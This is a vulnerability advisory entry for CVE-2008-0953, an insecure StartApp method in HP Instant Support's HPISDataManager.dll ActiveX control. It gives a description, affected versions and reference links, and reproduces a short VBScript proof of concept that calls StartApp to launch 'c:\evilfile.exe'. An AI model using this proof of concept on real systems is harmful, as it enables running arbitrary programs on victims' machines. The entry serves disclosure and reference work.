HP Instant Support HPISDataManager.dll ActiveX Control StartApp Function Buffer Overflow Vulnerability

Vulnerability ID: 1115337
Vulnerability type: Design Error
Published: 2008-06-03
Updated: 2008-08-25
CVE ID: CVE-2008-0953
CNNVD-ID: CNNVD-200806-063
Platform: Windows
CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/31876
https://www.securityfocus.com/bid/29533
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-063
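|Vulnerability Details
HP Instant Support is a suite of web-based troubleshooting and diagnostic tools for desktop computing and printing products. The StartApp function of the HPISDataManager.dll ActiveX control installed by HP Instant Support versions before 1.0.0.24 contains a vulnerability: a remote attacker can execute arbitrary programs by passing an .exe file as the argument.
|Vulnerability Exploit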
source: http://www.securityfocus.com/bid/29533/info


HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability.

Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer).

Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>

'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype  = "Function StartApp ( ByVal appName As String ) As String"
memberName = "StartApp"
progid     = "HPISDataManagerLib.Datamgr"
argCount   = 1

arg1="c:\evilfile.exe"

target.StartApp arg1

</script></job></package>
|Affected Products
HP Instant Support 1.0 .22
|References

Source: SECUNIA
Name: 30516
Link: http://secunia.com/advisories/30516
Source: XF
Name: hp-instantsupport-startapp-code-execution(42851)
Link: http://xforce.iss.net/xforce/xfdb/42851
Source: HP
Name: SSRT071490
Link: http://www12.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01422264
Source: SECTRACK
Name: 1020165
Link: http://www.securitytracker.com/id?1020165
Source: BID
Name: 29533
Link: http://www.securityfocus.com/bid/29533
Source: BID
Name: 29526
Link: http://www.securityfocus.com/bid/29526
Source: VUPEN
Name: ADV-2008-1740
Link: http://www.frsirt.com/english/advisories/2008/1740/references
Source: MISC
Link: http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf